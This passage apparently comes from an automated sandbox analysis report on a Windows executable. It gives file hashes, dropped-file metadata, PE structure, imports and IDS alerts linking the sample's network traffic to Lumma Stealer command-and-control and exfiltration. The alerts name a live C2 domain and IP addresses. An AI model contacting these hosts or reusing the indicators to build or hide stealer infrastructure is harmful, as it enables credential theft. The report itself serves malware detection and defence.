                                                                                              37f463bf4616ecd445d4a1937da06e19g7Mz6hLxqw.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 104.21.56.70
                                                                                              ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 104.21.56.70
                                                                                              Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 104.21.56.70
                                                                                              SvmL9tW29w.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 104.21.56.70
                                                                                              Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 104.21.56.70
                                                                                              fTSt7dc60O.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 104.21.56.70
                                                                                              vq6jxdGvD6.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 104.21.56.70
                                                                                              Ub46mg9pn4.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 104.21.56.70
                                                                                              fTSt7dc60O.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 104.21.56.70
                                                                                              nRNzqQOQwk.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 104.21.56.70
                                                                                              No context
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):1.0640691129898592
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:F1bF17tK0K3nrab0jsFmFAmzuiFcoZ24IO84g:3h17tRK3nbjDpzuiFcoY4IO8/
                                                                                              MD5:B091D7623C749826D9D1BB3ADF646FA6
                                                                                              SHA1:548F89DFC2CFD33AA46CCD10479A7AD63B3E75E3
                                                                                              SHA-256:2939279E841DC12A73E5459DBB1333167406E71825F6D0C5E0C3C4729B4ADABB
                                                                                              SHA-512:EFD75052FDC3847026D6D9DD47CB08034EF22F866D97B85336273B2C967FF1E459BAF5258083CA91487F182FD2B26A66C1C70082255B8194CF1190A31625EF1D
                                                                                              Malicious:true
                                                                                              Reputation:low
                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.9.9.5.3.8.2.3.2.8.3.2.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.9.9.5.3.8.2.8.9.0.8.2.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.2.d.0.1.1.1.-.c.d.8.4.-.4.6.8.5.-.8.d.3.e.-.9.5.5.4.d.c.c.e.d.6.3.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.a.0.5.a.c.b.-.e.2.e.e.-.4.f.9.7.-.8.0.5.0.-.1.c.0.9.d.d.f.6.8.6.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.B.5.A...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.0.8.-.0.0.0.1.-.0.0.1.4.-.4.0.4.6.-.4.5.a.5.7.1.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.b.d.9.f.5.4.c.d.b.a.8.3.c.9.2.a.5.d.5.a.8.0.4.f.2.d.c.d.d.5.4.0.0.0.0.4.2.0.7.!.0.0.0.0.0.a.0.d.7.9.5.5.d.e.a.8.5.4.3.9.1.d.4.2.7.3.5.a.b.8.a.a.c.6.5.4.1.3.b.6.2.5.0.b.!.3.B.5.A...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5./.
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, Fri Jan 10 15:09:42 2025, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):110778
                                                                                              Entropy (8bit):2.217284974877652
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:S42XJ27Bj8jTtjLDFodLi72KyJBxfk0Q9JlfCbj:SlZ27Bj0tnDF7mxsL3Cbj
                                                                                              MD5:CE0C82303043E0D289A2BA95AA9AF5FA
                                                                                              SHA1:B3518AB2DC9472166962B5A9B19C858892FBDFBA
                                                                                              SHA-256:6D4B45820B0EF9C3502F552327915BE51240408B20E308CB5015F09F19B3F882
                                                                                              SHA-512:6F162D3D8689D14E876666AB59FA2C66691CEC1ECE7B2410FFE9AF94C5AACA64D7967FF3FBE1911CC469AE125A9805438958DC7370D0139932A501327F42D4AF
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:MDMP..a..... .......68.g........................p...............h$...........N..........`.......8...........T...........HE..rk...........$...........&..............................................................................eJ......p'......GenuineIntel............T...........)8.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):8402
                                                                                              Entropy (8bit):3.6961033823279976
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:R6l7wVeJyk6Dz6YiK6UgmfITb+LpDp89bkBsfSsMm:R6lXJp6Dz6YH6UgmfITzk6fS+
                                                                                              MD5:116578ADDD1E3A4AF6546FC16C9518B1
                                                                                              SHA1:5473CC8670C41C7683D2758600516E07DB9F00BF
                                                                                              SHA-256:DE9287FAB8EA3C040712DD14FEC610D71C35F43C048A140B3F61B728011C92DA
                                                                                              SHA-512:842A60DEAE7486DBD8F4D1929C68170DE87FAC3AB49AD8D788A9534C50C8C06ACEA5ED13A5A25CD0E14C8901D0315D6B73114F1ECC5506A2021C1E2CD649560E
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.8.8.<./.P.i.
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4714
                                                                                              Entropy (8bit):4.465996329670659
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwWl8zstJg77aI9UnWpW8VYxoYm8M4Jxy0O3F6/+q8vcy0Om1GVcclid:uIjfHI7GW7VyJbp/KAb1+lid
                                                                                              MD5:B916A9171ED54D3C9BC3DD713978C421
                                                                                              SHA1:F29198C557039FC740CA8096F1AAE3163AA47FED
                                                                                              SHA-256:B92AF6373F577DA7C1FE441C69A1980FA646A22108BADFA58A351E1208D4774E
                                                                                              SHA-512:B48D8477D23D82AAB4E9CB8E008CE92356F2EB9700DD65B24CF91ADFCC2333FC7CA3CC259132CB64BBE31745230FB62103D4F143410E3EC3B5E04E43C7CDE43D
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="669972" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                              Process:C:\Users\user\Desktop\Mmm7GmDcR4.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):333312
                                                                                              Entropy (8bit):7.324214872542696
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:WbIULHOg8QOYJAAjVKuL8aC0rL0hFbE1hHYa3FFeMqVB9xPsCL7GvFKBCpCSV:Wv7OhYljVNLJRMhFbE11lXVs9FjGtEC
                                                                                              MD5:1B513E6F8721E444A9364DD93630F015
                                                                                              SHA1:0A0D7955DEA854391D42735AB8AAC65413B6250B
                                                                                              SHA-256:9185B7955FDBFCE261DFB295163DD00A8AE71D77F28F675CF4E5C14017281575
                                                                                              SHA-512:85394825D6BB71CA176CE8771E7A8EAEEEF3D4AB692151D896C4FB410AB32FA3B0C5307BC8F3C41E947A15DC19E9B2A024D2BAD5B30ACA80083D73EBB94BE94C
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                                                              Reputation:low
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r...6.k.6.k.6.k.....7.k.(....k.(...(.k.(..L.k..Q..5.k.6.j.C.k.(..7.k.(...7.k.(...7.k.Rich6.k.................PE..L......e.................&...........^.......@....@..........................................................................+..(.......(........................................................... G..@...............|............................text...p$.......&.................. ..`.data.......@...`...*..............@....rsrc...(...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\Mmm7GmDcR4.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):333312
                                                                                              Entropy (8bit):7.324214872542696
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:WbIULHOg8QOYJAAjVKuL8aC0rL0hFbE1hHYa3FFeMqVB9xPsCL7GvFKBCpCSV:Wv7OhYljVNLJRMhFbE11lXVs9FjGtEC
                                                                                              MD5:1B513E6F8721E444A9364DD93630F015
                                                                                              SHA1:0A0D7955DEA854391D42735AB8AAC65413B6250B
                                                                                              SHA-256:9185B7955FDBFCE261DFB295163DD00A8AE71D77F28F675CF4E5C14017281575
                                                                                              SHA-512:85394825D6BB71CA176CE8771E7A8EAEEEF3D4AB692151D896C4FB410AB32FA3B0C5307BC8F3C41E947A15DC19E9B2A024D2BAD5B30ACA80083D73EBB94BE94C
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                                                              Reputation:low
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r...6.k.6.k.6.k.....7.k.(....k.(...(.k.(..L.k..Q..5.k.6.j.C.k.(..7.k.(...7.k.(...7.k.Rich6.k.................PE..L......e.................&...........^.......@....@..........................................................................+..(.......(........................................................... G..@...............|............................text...p$.......&.................. ..`.data.......@...`...*..............@....rsrc...(...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                              Category:dropped
                                                                                              Size (bytes):1835008
                                                                                              Entropy (8bit):4.393922907312448
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:8l4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNpROBSqa:04vF0MYQUMM6VFY3RU
                                                                                              MD5:DD2577C8880F16117B51CC720ED0CB9F
                                                                                              SHA1:AC3F05A256E6254EC51ED77F1E0D15176B47692D
                                                                                              SHA-256:8D153D8160CEE9C0E5C73505ABA84C12F73A75F6936E1C4A7892170734B9FF69
                                                                                              SHA-512:6C9B68CA78F5F54655A3E6470DC3C28098B869891E94ACC2923C91E76CDE74DF95A42C363A68E1E3A47BD68725F8B9B78E6AD905CB87B100481DE4C9B5318D73
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr@..qc...............................................................................................................................................................................................................................................................................................................................................).........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.4119608514412505
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:Mmm7GmDcR4.exe
                                                                                              File size:394'240 bytes
                                                                                              MD5:c4a14694e0fb534e9cbfbff50be90ba3
                                                                                              SHA1:7040e13af97e90812c71c8123612a1aeddb72e1c
                                                                                              SHA256:07816ec07a38281ba2a1bf12ca405b30f57befa02ddf9e1e07a0e0b764db17bc
                                                                                              SHA512:4bf98916281356e09ebdd8058c330bd997b7baab0750917409dc10aaa0a9e6acd93f781898f54162592b6a43a9d102fc363b4cf7e69a650b618cb6095fe593de
                                                                                              SSDEEP:6144:xbLkKNP9yJcKe/VAkE5yyW09P+KwHOpOxxU34xsU0jh11ku:xb4KNP9OcpVAkE5y9/LU342Uq
                                                                                              TLSH:5E840112B491CC31C9D19530CC21DBE1A67FB8B19A69624B77A83F2F7E702C26775346
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.....k...k...k.......k.....;.k.......k.....d.k.9Q....k...j.m.k.......k.......k.......k.Rich..k.........PE..L...Q.-e...........
                                                                                              Icon Hash:46c7c30b0f4e0d19
                                                                                              Entrypoint:0x405ea5
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x652DF351 [Tue Oct 17 02:37:05 2023 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:0
                                                                                              File Version Major:5
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f1a284160f5fd4e3fe38e6c0d7b69c82
                                                                                              Instruction
                                                                                              call 00007F5844883E84h
                                                                                              jmp 00007F58448805FEh
                                                                                              int3
                                                                                              call 00007F58448807BCh
                                                                                              xchg cl, ch
                                                                                              jmp 00007F58448807A4h
                                                                                              call 00007F58448807B3h
                                                                                              fxch st(0), st(1)
                                                                                              jmp 00007F584488079Bh
                                                                                              fabs
                                                                                              fld1
                                                                                              mov ch, cl
                                                                                              xor cl, cl
                                                                                              jmp 00007F5844880791h
                                                                                              mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                                              fabs
                                                                                              fxch st(0), st(1)
                                                                                              fabs
                                                                                              fxch st(0), st(1)
                                                                                              fpatan
                                                                                              or cl, cl
                                                                                              je 00007F5844880786h
                                                                                              fldpi
                                                                                              fsubrp st(1), st(0)
                                                                                              or ch, ch
                                                                                              je 00007F5844880784h
                                                                                              fchs
                                                                                              ret
                                                                                              fabs
                                                                                              fld st(0), st(0)
                                                                                              fld st(0), st(0)
                                                                                              fld1
                                                                                              fsubrp st(1), st(0)
                                                                                              fxch st(0), st(1)
                                                                                              fld1
                                                                                              faddp st(1), st(0)
                                                                                              fmulp st(1), st(0)
                                                                                              ftst
                                                                                              wait
                                                                                              fstsw word ptr [ebp-000000A0h]
                                                                                              wait
                                                                                              test byte ptr [ebp-0000009Fh], 00000001h
                                                                                              jne 00007F5844880787h
                                                                                              xor ch, ch
                                                                                              fsqrt
                                                                                              ret
                                                                                              pop eax
                                                                                              jmp 00007F584488160Fh
                                                                                              fstp st(0)
                                                                                              fld tbyte ptr [0045107Ah]
                                                                                              ret
                                                                                              fstp st(0)
                                                                                              or cl, cl
                                                                                              je 00007F584488078Dh
                                                                                              fstp st(0)
                                                                                              fldpi
                                                                                              or ch, ch
                                                                                              je 00007F5844880784h
                                                                                              fchs
                                                                                              ret
                                                                                              fstp st(0)
                                                                                              fldz
                                                                                              or ch, ch
                                                                                              je 00007F5844880779h
                                                                                              fchs
                                                                                              ret
                                                                                              fstp st(0)
                                                                                              jmp 00007F58448815E5h
                                                                                              fstp st(0)
                                                                                              mov cl, ch
                                                                                              jmp 00007F5844880782h
                                                                                              call 00007F584488074Eh
                                                                                              jmp 00007F58448815F0h
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              add esp, FFFFFD30h
                                                                                              push ebx
                                                                                              wait
                                                                                              fstcw word ptr [ebp+00000000h]
                                                                                              Programming Language:
                                                                                              • [C++] VS2008 build 21022
                                                                                              • [ASM] VS2008 build 21022
                                                                                              • [ C ] VS2008 build 21022
                                                                                              • [IMP] VS2005 build 50727
                                                                                              • [RES] VS2008 build 21022
                                                                                              • [LNK] VS2008 build 21022
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x4f7fc0x28.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000xac68.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x47100x40.text
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x174.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x4f0560x4f200e25de9341bab8b48be4d7ddbfe051106False0.8980919233807267OpenPGP Public Key Version 47.853906192557659IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .data0x510000x86e40x600033a0542f37f3ecf2c5801f112336620aFalse0.08060709635416667data0.9428032134200005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x5a0000xdc680xae001e8b34a83ddb99c41054004d814875f0False0.5448994252873564data5.542931404262921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_CURSOR0x604000x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                                              RT_CURSOR0x607300x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                                              RT_CURSOR0x608880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                                              RT_CURSOR0x617300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                                              RT_CURSOR0x61fd80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                                              RT_CURSOR0x625700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                                                                                              RT_CURSOR0x634180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                                                                                              RT_CURSOR0x63cc00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                                                                                              RT_ICON0x5a5100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRomanianRomania0.802771855010661
                                                                                              RT_ICON0x5b3b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRomanianRomania0.8659747292418772
                                                                                              RT_ICON0x5bc600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRomanianRomania0.7707373271889401
                                                                                              RT_ICON0x5c3280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRomanianRomania0.7875722543352601
                                                                                              RT_ICON0x5c8900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216RomanianRomania0.8049792531120332
                                                                                              RT_ICON0x5ee380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096RomanianRomania0.8330206378986866
                                                                                              RT_ICON0x5fee00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024RomanianRomania0.8634751773049646
                                                                                              RT_STRING0x644700x4c0dataRomanianRomania0.453125
                                                                                              RT_STRING0x649300x338dataRomanianRomania0.4696601941747573
                                                                                              RT_ACCELERATOR0x603b00x50dataRomanianRomania0.8125
                                                                                              RT_GROUP_CURSOR0x608600x22data1.0294117647058822
                                                                                              RT_GROUP_CURSOR0x625400x30data0.9375
                                                                                              RT_GROUP_CURSOR0x642280x30data0.9375
                                                                                              RT_GROUP_ICON0x603480x68dataRomanianRomania0.6826923076923077
                                                                                              RT_VERSION0x642580x218data0.5261194029850746
                                                                                              DLLImport
                                                                                              KERNEL32.dllSetLocaleInfoA, InterlockedIncrement, EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, WriteConsoleInputA, EnumCalendarInfoExW, EnumTimeFormatsW, LoadLibraryW, SetCommConfig, SwitchToFiber, GetConsoleAliasExesLengthW, GetVersionExW, FindNextVolumeW, GetAtomNameW, GetModuleFileNameW, FindNextVolumeMountPointW, GetShortPathNameA, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, LoadLibraryA, FindNextFileA, EnumDateFormatsA, OpenEventW, ReadConsoleInputW, TerminateJobObject, GetWindowsDirectoryW, GetCurrentProcessId, OpenFileMappingA, EnumSystemLocalesW, GetModuleHandleW, Sleep, ExitProcess, GetStartupInfoW, HeapFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, CloseHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, HeapReAlloc, RaiseException, GetModuleHandleA, SetStdHandle, RtlUnwind, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              RomanianRomania
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2025-01-10T16:09:28.195709+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949726104.21.56.70443TCP
                                                                                              2025-01-10T16:09:29.068987+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949735176.113.115.1980TCP
                                                                                              2025-01-10T16:09:31.364967+01002059088ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)1192.168.2.9632181.1.1.153UDP
                                                                                              2025-01-10T16:09:31.848295+01002059089ET MALWARE Observed Win32/Lumma Stealer Related Domain (skidjazzyric .click in TLS SNI)1192.168.2.949756104.21.32.1443TCP
                                                                                              2025-01-10T16:09:31.848295+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949756104.21.32.1443TCP
                                                                                              2025-01-10T16:09:32.322133+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949756104.21.32.1443TCP
                                                                                              2025-01-10T16:09:32.322133+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949756104.21.32.1443TCP
                                                                                              2025-01-10T16:09:32.842826+01002059089ET MALWARE Observed Win32/Lumma Stealer Related Domain (skidjazzyric .click in TLS SNI)1192.168.2.949762104.21.32.1443TCP
                                                                                              2025-01-10T16:09:32.842826+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949762104.21.32.1443TCP
                                                                                              2025-01-10T16:09:33.372820+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949762104.21.32.1443TCP
                                                                                              2025-01-10T16:09:33.372820+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949762104.21.32.1443TCP
                                                                                              2025-01-10T16:09:34.173219+01002059089ET MALWARE Observed Win32/Lumma Stealer Related Domain (skidjazzyric .click in TLS SNI)1192.168.2.949768104.21.32.1443TCP
                                                                                              2025-01-10T16:09:34.173219+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949768104.21.32.1443TCP
                                                                                              2025-01-10T16:09:36.272079+01002059089ET MALWARE Observed Win32/Lumma Stealer Related Domain (skidjazzyric .click in TLS SNI)1192.168.2.949776104.21.32.1443TCP
                                                                                              2025-01-10T16:09:36.272079+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949776104.21.32.1443TCP
                                                                                              2025-01-10T16:09:36.819640+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949776104.21.32.1443TCP
                                                                                              2025-01-10T16:09:38.795249+01002059089ET MALWARE Observed Win32/Lumma Stealer Related Domain (skidjazzyric .click in TLS SNI)1192.168.2.949784104.21.32.1443TCP
                                                                                              2025-01-10T16:09:38.795249+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949784104.21.32.1443TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 10, 2025 16:09:27.116249084 CET49726443192.168.2.9104.21.56.70
                                                                                              Jan 10, 2025 16:09:27.116312027 CET44349726104.21.56.70192.168.2.9
                                                                                              Jan 10, 2025 16:09:27.116534948 CET49726443192.168.2.9104.21.56.70
                                                                                              Jan 10, 2025 16:09:27.213346004 CET49726443192.168.2.9104.21.56.70
                                                                                              Jan 10, 2025 16:09:27.213392019 CET44349726104.21.56.70192.168.2.9
                                                                                              Jan 10, 2025 16:09:27.721985102 CET44349726104.21.56.70192.168.2.9
                                                                                              Jan 10, 2025 16:09:27.722084045 CET49726443192.168.2.9104.21.56.70
